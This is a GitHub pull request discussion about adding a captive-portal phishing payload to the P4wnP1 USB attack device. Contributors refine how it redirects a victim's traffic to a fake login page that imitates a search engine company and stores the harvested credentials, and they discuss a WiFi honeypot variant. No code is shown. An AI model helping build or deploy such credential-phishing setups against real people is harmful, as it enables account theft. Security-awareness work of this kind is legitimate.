Added Payload #152
Added Payload #152
Conversation
Payload Captive Portal has been added. Redirects traffic to phishing page and saves collected data to text file.
There was a problem hiding this comment.
Looks promising, but it why does it only Support Windows? It would be nice if you could add some legit-looking templates and support ECM and maybe Wifi (changes to the core would have to be made so it can setup an open hotspot). Setup would still be possible through Bluetooth. Also, I would not hardcode the ip addresses and use the variables from the setup.cfg ($IF_IP for example)
|
I'm working on the ECM support, as for wifi I'll have to look into it. |
|
Ok. And Apache and PHP are kind off heavy requirements, so it would be nice if you could replace them with something like a modified Python http server. |
|
Sure, I'll try to add the ECM and $IF_IP in the next commit but python and wifi will take another commit after that since i have my gripes with python servers. p.s : Just a quick question : Can I use $active_interface with ecm (or at all, since i couldn't get it working on RNDIS either) since some Linux systems seem to use the enp* adapter naming system. |
|
P4wnP1 runs on raspbian, so as far as I know, using $active_interace should work fine. Some Linux Distros (like Kali) have drivers for ECM and RNDIS but that should not cause any trouble since one gets disabled after a connection was established. The OS/Linux-flavor of target shouldn't matter since the only "code" running on the target is the served html. |
|
Apache2 seems to be fine in this case, as it is manually started by this payload. As long as the service isn't globally enabled ot shouldn't have impact on boot time of other payloads. It should be mentioned that something similar could be achieved with responder forcing HTTP basic auth on every HTTP request. According According the payload: I very much appreciate receiving a first payload commit. Author notice and credits for author of the original script are in place. I hope some folks are able to test this, before I merge, because I'm not able to test it myself during the next days. |
Uses $IF_IP variable from setup.cfg instead of specific ip, allows ip changed in setup.cfg to be used in payload. Also added experimental ECM, may work , may not work. Basically WIP.
|
I've added the IP variable but ECM seems to not work with ROUTE_SPOOF, it still looks for a gateway in my router's IP (which on my Kali VM is disconnected). IIf not that it will fail to redirect to the Pi's IP. |
ECM works now. Kinda obvious in the title.
Minor change in process to make the payload a little more organised.
|
ECM now works. The last thing I'll be working on for this payload is the wifi honeypot. I still need to figure out how to change to DNS server of a phone but it shouldn't be too long before I get the WIFI working. I'm kind of sceptical about using HTML login templates since they may have licencing issues but I'll try pushing a free one into this branch Really hope people like it. |
|
You can make a guide on how to modify the html locally so people can make their own captive portals from proprietary websites. |
|
As stated I'm involved into some other tasks, which doesn't allow me to work on P4wnP1 right now. Anyway, as I'm preparing some talks (including WiFi security) I have a solution ready, including code and a template for a custom captive portal: https://github.com/mame82/awareness_wifi?files=1 I'm planning to move everything over to P4wnP1 (excluding the Karma attack, as the nexmon firmware needs to be patched), as soon as I have time to. Feel free to use the template meanwhile, but please don't include the backdoored app. |
Added a pretty legit looking portal that looks like something made by a certain search engine company (゜‿ ^) Also updated README.MD with appropriate credits.
|
I added a more legit portal now, so it should look like something made by a more reputable company and not some guy in his basement. Credits and license are included too. Also mame the readme for the wifi talks has a few typos. |
|
@mame82 is the core still in development or am I free to add some new features in the meantime? |
|
@Swiftb0y not able to review PRs for next 3 weeks |
|
@Swiftb0y, you tried the payload yet? I want to know if anything is glitchy. |
|
Sorry im currently not able to connect the pi to the Internet. I maybe able to gym that to work again this week. |
|
Anyone have any progress testing or any suggestions? |
|
@Brisk4t Yes I have tested the new Payload, would be nice if once
credentials are stored the P4wnP1 disconnects itself (I don't know if this
is possible.
…On Fri, Dec 8, 2017, 07:11 Brisk4t ***@***.***> wrote:
Anyone have any progress testing or any suggestions?
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#152 (comment)>, or mute
the thread
<https://github.com/notifications/unsubscribe-auth/ASxAJcz_KTiI2S7zUy3nls8-l-MVhsbNks5s-SdpgaJpZM4QB8Ki>
.
|
|
Thanks, ill try to add that, any bugs that you know of? |
|
Yes, not sure how or why but sometimes the browser will jump between P4wnP1
page and actual site. Maybe if the website was previously cached?
…On Fri, Dec 8, 2017, 07:48 Brisk4t ***@***.***> wrote:
Thanks, ill try to add that, any bugs that you know of?
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<#152 (comment)>, or mute
the thread
<https://github.com/notifications/unsubscribe-auth/ASxAJa9D-ZvarJ5-cykN6Mx5Cj46qq1fks5s-TAogaJpZM4QB8Ki>
.
|
|
Yea, that's caching alright, unless you can use the site properly. |
Payload Captive Portal has been added.
Redirects traffic to phishing page and saves collected data to text file.
Uses RNDIS attack method with optional supplementary methods.